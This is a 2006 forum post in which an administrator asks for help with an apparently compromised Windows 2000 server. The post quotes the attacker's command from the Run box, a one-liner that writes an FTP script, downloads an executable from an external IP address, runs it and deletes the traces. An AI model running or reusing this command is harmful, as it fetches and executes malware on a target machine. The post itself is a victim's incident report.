Compromised Windows 2000 Server?
Posted on 2006-10-25
I logged into a Win2k Server in a remote office this morning and was greeted by two ftp dos screens with the following in them :
126.96.36.199 Microsoft FTP
get 84785_redworld2.exe etc. etc.
Then there is some reference to 'Lizard Welcomes You' after FTP login..
This was in Start - Run :
cmd /c echo OPEN 188.8.131.52 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
It certainly appears that the server has been accessed from an external source. We use a Sonicwall Firewall, Server is fully patched. Can anyone shed some light on this please?